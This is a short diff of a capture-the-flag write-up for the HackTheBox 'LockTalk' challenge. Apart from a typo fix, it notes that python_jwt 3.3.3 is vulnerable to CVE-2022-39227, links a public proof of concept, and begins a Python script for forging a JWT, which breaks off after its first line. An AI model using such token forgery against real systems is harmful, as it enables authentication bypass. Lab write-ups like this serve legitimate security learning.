NoSpaceAvailable/HackTheBox-Cyber-Apocalypse-CTF-2024/LockTalk.md

   python_jwt==3.3.3
   ```

-- This verison has a vulnerability explained in [CVE-2022-39227](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39227).
+- This version has a vulnerability explained in [CVE-2022-39227](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39227).
 Luckily, there is an available [POC](https://github.com/user0x1337/CVE-2022-39227) that I can use.
 Or you can use this script to create a fake JWT:
   ```python
   def exp(token):
     [header, payload, signature] = token.split(".")